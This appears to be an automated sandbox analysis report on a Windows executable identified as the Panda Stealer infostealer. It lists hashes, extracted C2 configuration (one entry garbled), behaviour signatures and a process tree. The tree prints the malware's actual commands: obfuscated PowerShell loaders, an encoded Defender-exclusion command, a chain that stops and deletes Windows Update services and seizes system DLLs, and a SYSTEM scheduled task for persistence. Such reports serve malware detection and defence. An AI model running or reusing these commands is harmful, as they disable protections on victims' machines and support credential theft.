Overview

overview

10

Static

static

3

abdd8d2b92...73.exe

windows7-x64

10

abdd8d2b92...73.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    80s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20231020-en
  • resource tags

    arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system
  • submitted
    23-11-2023 03:13

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    abdd8d2b92994b87215496904e6f7b352de5391eab24275a394c6eb018d29273.exe

  • Size

    24.8MB

  • MD5

    2a7a396903e48cf898f8e9c6c77a875d

  • SHA1

    6547cbb2947e005c9ea42539107b98db8b9c77d7

  • SHA256

    abdd8d2b92994b87215496904e6f7b352de5391eab24275a394c6eb018d29273

  • SHA512

    63689d85ae71a1a703d58b16b5c45891c8048e1eb63252b105eee640b5923f7ac882ab767f7cc3089e0b919d7e6a826d5c6220fb1d7dee4ea284e2f172b1e189

  • SSDEEP

    393216:F8QZskDN3u5yyHTV7JDL9a+43tFuUiuJzuFfTy1J4uz4SfPIY:F8QZsudeDL9n43X9iuNWTS9X3

Score
10/10
pandastealerdiscoveryevasionexploitspywarestealer

Malware Config

Extracted

Family

pandastealer

Version

:�=��^V��p��X7����E|^�fh�8v��4��ok)�E�B�u�:�,�=M懼:AG d�.�eM�w��̻����*

C2

http://�p��X7����E|^�fh�8v��4��ok)�E�B�u�:�,�=M懼:AG d�.�eM�w��̻����*

Extracted

Family

pandastealer

Version

1.11

C2

http://f0854165.xsph.ru

Signatures

  • Modifies security service 2 TTPs 2 IoCs
    evasion
  • Panda Stealer payload 5 IoCs
  • PandaStealer

    Panda Stealer is a fork of CollectorProject Stealer written in C++.

    stealerpandastealer
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Possible privilege escalation attempt 4 IoCs
    exploit
  • Stops running service(s) 3 TTPs
    evasion
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 7 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
    discovery
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Drops file in System32 directory 6 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 6 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Modifies data under HKEY_USERS 5 IoCs
  • Modifies registry key 1 TTPs 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\lsass.exe
    C:\Windows\system32\lsass.exe
    1⤵
      PID:480
    • C:\Windows\system32\services.exe
      C:\Windows\system32\services.exe
      1⤵
        PID:464
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k RPCSS
          2⤵
            PID:680
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
            2⤵
              PID:740
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k netsvcs
              2⤵
              • Drops file in Windows directory
              • Suspicious use of AdjustPrivilegeToken
              PID:868
              • C:\Windows\system32\taskeng.exe
                taskeng.exe {406E4B46-2AE4-4A54-BEF2-0E7BC4A24A2E} S-1-5-18:NT AUTHORITY\System:Service:
                3⤵
                • Loads dropped DLL
                PID:2388
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
                  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
                  4⤵
                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                  • Drops file in System32 directory
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1144
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
                  4⤵
                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                  • Drops file in System32 directory
                  • Suspicious use of SetThreadContext
                  • Modifies data under HKEY_USERS
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1252
                • C:\Users\opera\AppData\Local\Temp\bc3902d8132f43e3ae086a009979fa88\WCCNativeHost.exe
                  C:\Users\opera\AppData\Local\Temp\bc3902d8132f43e3ae086a009979fa88\WCCNativeHost.exe
                  4⤵
                  • Executes dropped EXE
                  • Modifies data under HKEY_USERS
                  PID:1020
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAZABzACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdwBsAGYAdwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB4AGIAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcwBjACMAPgA="
                    5⤵
                    • Drops file in System32 directory
                    PID:2696
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                    5⤵
                      PID:2940
                      • C:\Windows\system32\sc.exe
                        sc stop UsoSvc
                        6⤵
                        • Launches sc.exe
                        PID:2604
                      • C:\Windows\system32\sc.exe
                        sc stop WaaSMedicSvc
                        6⤵
                        • Launches sc.exe
                        PID:952
                      • C:\Windows\system32\sc.exe
                        sc stop wuauserv
                        6⤵
                        • Launches sc.exe
                        PID:1628
                      • C:\Windows\system32\sc.exe
                        sc stop bits
                        6⤵
                        • Launches sc.exe
                        PID:2108
                      • C:\Windows\system32\sc.exe
                        sc stop dosvc
                        6⤵
                        • Launches sc.exe
                        PID:2448
                      • C:\Windows\system32\reg.exe
                        reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                        6⤵
                        • Modifies registry key
                        PID:2832
                      • C:\Windows\system32\reg.exe
                        reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                        6⤵
                        • Modifies registry key
                        PID:2540
                      • C:\Windows\system32\reg.exe
                        reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                        6⤵
                        • Modifies registry key
                        PID:2652
                      • C:\Windows\system32\reg.exe
                        reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                        6⤵
                        • Modifies registry key
                        PID:1104
                      • C:\Windows\system32\reg.exe
                        reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                        6⤵
                        • Modifies registry key
                        PID:2980
                      • C:\Windows\system32\takeown.exe
                        takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                        6⤵
                        • Possible privilege escalation attempt
                        • Modifies file permissions
                        PID:1940
                      • C:\Windows\system32\icacls.exe
                        icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                        6⤵
                        • Possible privilege escalation attempt
                        • Modifies file permissions
                        PID:792
                      • C:\Windows\system32\reg.exe
                        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                        6⤵
                        • Modifies registry key
                        PID:1680
                      • C:\Windows\system32\reg.exe
                        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                        6⤵
                        • Modifies registry key
                        PID:2332
                      • C:\Windows\system32\reg.exe
                        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                        6⤵
                        • Modifies registry key
                        PID:2640
                      • C:\Windows\system32\reg.exe
                        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                        6⤵
                        • Modifies registry key
                        PID:1604
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                        6⤵
                          PID:584
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                          6⤵
                            PID:1368
                          • C:\Windows\system32\schtasks.exe
                            SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                            6⤵
                              PID:1080
                            • C:\Windows\system32\schtasks.exe
                              SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                              6⤵
                                PID:2188
                              • C:\Windows\system32\schtasks.exe
                                SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                                6⤵
                                  PID:2644
                                • C:\Windows\system32\schtasks.exe
                                  SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                                  6⤵
                                    PID:1664
                                  • C:\Windows\system32\schtasks.exe
                                    SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                    6⤵
                                      PID:2420
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                    5⤵
                                      PID:2076
                                      • C:\Windows\system32\powercfg.exe
                                        powercfg /x -hibernate-timeout-ac 0
                                        6⤵
                                          PID:1792
                                        • C:\Windows\system32\powercfg.exe
                                          powercfg /x -hibernate-timeout-dc 0
                                          6⤵
                                            PID:1924
                                          • C:\Windows\system32\powercfg.exe
                                            powercfg /x -standby-timeout-ac 0
                                            6⤵
                                              PID:2500
                                            • C:\Windows\system32\powercfg.exe
                                              powercfg /x -standby-timeout-dc 0
                                              6⤵
                                                PID:1488
                                            • C:\Windows\System32\dialer.exe
                                              C:\Windows\System32\dialer.exe "ecbnmucinqopk"
                                              5⤵
                                                PID:2692
                                              • C:\Windows\System32\dialer.exe
                                                C:\Windows\System32\dialer.exe tuczxejnwvufkvmy0 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPrOXm4kGtEn/ZgPyjiDYwe/r1fSHnQn/pEJoE0c2Z8yo6KfLQ7T4O/sPytLA1Ofy6pCJPfSldtWwn5MefTIOJwpGDgIBcVL3mnhbdQl7r9kVrbyBSbRTxTWkEMFXHM6mel4aCfmftFypMhsz+/XH1E0hLhu4BSXq/o7kGj4I4EWA8d7/NcIvtUambozA877872MOPkfuoq6bfGtpEjUu1U19sqZWGfdh5fNeKW+HxsBw01PpwWKMod5fwuXcPDtZzO9Y5GZ/WMFheKxDEMGjCxi5wvdL6r6Xu3cxFpqAJEo8eiYnmGP8rnU8j/vu+XhFQuLjC7zSu0nMBx360BhinwiE4UhlNjs80duPhebhj+vKCD4Uufq+UsQbo/1rZgtkwdlevHGq8YKILuUh5DjE2IKiBb1ZnCXupMzMezP3iLtvADA43ac+eBkp2SEGHHV7CPgzAX7bbJtNeWefpaVLgjv+as7955WlaP0GVDjFKTQoUN56RY0aLZUiAaX6UbPAgeFXukUvQQ0IBZg7zqzvndakosTXsagspiC4NAFXOKFbRuqrfiIAbIJAfMwZ65cuwioWpG1q3VQUCN0q3TWRhah
                                                5⤵
                                                  PID:2264
                                            • C:\Windows\system32\wbem\WMIADAP.EXE
                                              wmiadap.exe /F /T /R
                                              3⤵
                                              • Drops file in System32 directory
                                              PID:2900
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k NetworkService
                                            2⤵
                                              PID:276
                                            • C:\Windows\system32\sppsvc.exe
                                              C:\Windows\system32\sppsvc.exe
                                              2⤵
                                                PID:2456
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
                                                2⤵
                                                  PID:2284
                                                • C:\Windows\system32\taskhost.exe
                                                  "taskhost.exe"
                                                  2⤵
                                                    PID:1124
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
                                                    2⤵
                                                      PID:1060
                                                    • C:\Windows\System32\spoolsv.exe
                                                      C:\Windows\System32\spoolsv.exe
                                                      2⤵
                                                        PID:960
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k LocalService
                                                        2⤵
                                                          PID:972
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
                                                          2⤵
                                                            PID:820
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k DcomLaunch
                                                            2⤵
                                                              PID:604
                                                              • C:\Windows\system32\wbem\wmiprvse.exe
                                                                C:\Windows\system32\wbem\wmiprvse.exe -Embedding
                                                                3⤵
                                                                  PID:2536
                                                            • C:\Windows\system32\winlogon.exe
                                                              winlogon.exe
                                                              1⤵
                                                                PID:420
                                                                • C:\Windows\System32\dllhost.exe
                                                                  C:\Windows\System32\dllhost.exe /Processid:{11a0a240-e97a-4e75-af75-2abc306c87a7}
                                                                  2⤵
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:1176
                                                                • C:\Windows\SysWOW64\dllhost.exe
                                                                  C:\Windows\SysWOW64\dllhost.exe /Processid:{552adc47-c6b4-4521-996f-fdcef9ce873a}
                                                                  2⤵
                                                                    PID:1996
                                                                • C:\Windows\system32\lsm.exe
                                                                  C:\Windows\system32\lsm.exe
                                                                  1⤵
                                                                    PID:488
                                                                  • C:\Windows\Explorer.EXE
                                                                    C:\Windows\Explorer.EXE
                                                                    1⤵
                                                                      PID:1232
                                                                      • C:\Users\Admin\AppData\Local\Temp\abdd8d2b92994b87215496904e6f7b352de5391eab24275a394c6eb018d29273.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\abdd8d2b92994b87215496904e6f7b352de5391eab24275a394c6eb018d29273.exe"
                                                                        2⤵
                                                                          PID:1412
                                                                          • C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe"
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of SetThreadContext
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            • Suspicious use of WriteProcessMemory
                                                                            PID:3020
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAZABzACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdwBsAGYAdwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB4AGIAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcwBjACMAPgA="
                                                                              4⤵
                                                                              • Drops file in System32 directory
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:1372
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                                                              4⤵
                                                                              • Suspicious use of WriteProcessMemory
                                                                              PID:2532
                                                                              • C:\Windows\system32\sc.exe
                                                                                sc stop WaaSMedicSvc
                                                                                5⤵
                                                                                • Launches sc.exe
                                                                                PID:1720
                                                                              • C:\Windows\system32\icacls.exe
                                                                                icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                                                                                5⤵
                                                                                • Possible privilege escalation attempt
                                                                                • Modifies file permissions
                                                                                PID:2964
                                                                              • C:\Windows\system32\takeown.exe
                                                                                takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                                                                5⤵
                                                                                • Possible privilege escalation attempt
                                                                                • Modifies file permissions
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:1112
                                                                              • C:\Windows\system32\reg.exe
                                                                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                                                                                5⤵
                                                                                • Modifies registry key
                                                                                PID:2472
                                                                              • C:\Windows\system32\reg.exe
                                                                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                                                                                5⤵
                                                                                • Modifies registry key
                                                                                PID:2500
                                                                              • C:\Windows\system32\reg.exe
                                                                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                                                                                5⤵
                                                                                • Modifies security service
                                                                                • Modifies registry key
                                                                                PID:536
                                                                              • C:\Windows\system32\reg.exe
                                                                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                                                                                5⤵
                                                                                • Modifies registry key
                                                                                PID:472
                                                                              • C:\Windows\system32\reg.exe
                                                                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                                                                                5⤵
                                                                                • Modifies registry key
                                                                                PID:596
                                                                              • C:\Windows\system32\sc.exe
                                                                                sc stop dosvc
                                                                                5⤵
                                                                                • Launches sc.exe
                                                                                PID:2232
                                                                              • C:\Windows\system32\sc.exe
                                                                                sc stop bits
                                                                                5⤵
                                                                                • Launches sc.exe
                                                                                PID:1708
                                                                              • C:\Windows\system32\sc.exe
                                                                                sc stop wuauserv
                                                                                5⤵
                                                                                • Launches sc.exe
                                                                                PID:2016
                                                                              • C:\Windows\system32\sc.exe
                                                                                sc stop UsoSvc
                                                                                5⤵
                                                                                • Launches sc.exe
                                                                                PID:768
                                                                              • C:\Windows\system32\reg.exe
                                                                                reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                                                                                5⤵
                                                                                • Modifies registry key
                                                                                PID:2940
                                                                              • C:\Windows\system32\reg.exe
                                                                                reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                                                                                5⤵
                                                                                • Modifies registry key
                                                                                PID:2708
                                                                              • C:\Windows\system32\reg.exe
                                                                                reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                                                                                5⤵
                                                                                • Modifies registry key
                                                                                PID:2868
                                                                              • C:\Windows\system32\schtasks.exe
                                                                                SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                                                                                5⤵
                                                                                • Loads dropped DLL
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:1412
                                                                              • C:\Windows\system32\schtasks.exe
                                                                                SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                                                                                5⤵
                                                                                  PID:2784
                                                                                • C:\Windows\system32\reg.exe
                                                                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                                                                                  5⤵
                                                                                  • Modifies registry key
                                                                                  PID:2932
                                                                                • C:\Windows\system32\schtasks.exe
                                                                                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                                                                                  5⤵
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:1844
                                                                                • C:\Windows\system32\schtasks.exe
                                                                                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                                                                                  5⤵
                                                                                    PID:2000
                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                    SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                                                                                    5⤵
                                                                                      PID:2344
                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                      SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                                                                                      5⤵
                                                                                        PID:2640
                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                                                                        5⤵
                                                                                          PID:1512
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /c schtasks /run /tn "DBassistant"
                                                                                        4⤵
                                                                                          PID:2688
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "DBassistant" /tr "\"C:\Users\opera\AppData\Local\Temp\bc3902d8132f43e3ae086a009979fa88\WCCNativeHost.exe\""
                                                                                          4⤵
                                                                                            PID:2060
                                                                                          • C:\Windows\System32\conhost.exe
                                                                                            C:\Windows\System32\conhost.exe
                                                                                            4⤵
                                                                                            • Drops file in Windows directory
                                                                                            PID:2156
                                                                                          • C:\Windows\System32\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                                                            4⤵
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:1828
                                                                                        • C:\Users\Admin\AppData\Local\Temp\lrucache.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\lrucache.exe"
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          PID:2720
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Reg.Organizer.v9.11.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\Reg.Organizer.v9.11.exe"
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          PID:2844
                                                                                    • C:\Windows\system32\Dwm.exe
                                                                                      "C:\Windows\system32\Dwm.exe"
                                                                                      1⤵
                                                                                        PID:1192
                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                        powercfg /x -hibernate-timeout-dc 0
                                                                                        1⤵
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:1948
                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                        powercfg /x -standby-timeout-dc 0
                                                                                        1⤵
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:436
                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                        schtasks /run /tn "DBassistant"
                                                                                        1⤵
                                                                                          PID:1536
                                                                                        • C:\Windows\system32\conhost.exe
                                                                                          \??\C:\Windows\system32\conhost.exe "20643481801792225272-992503127-90895432-595914365-455286142-1181026813-1862876821"
                                                                                          1⤵
                                                                                            PID:1664
                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                            schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "DBassistant" /tr "\"C:\Users\opera\AppData\Local\Temp\bc3902d8132f43e3ae086a009979fa88\WCCNativeHost.exe\""
                                                                                            1⤵
                                                                                            • Creates scheduled task(s)
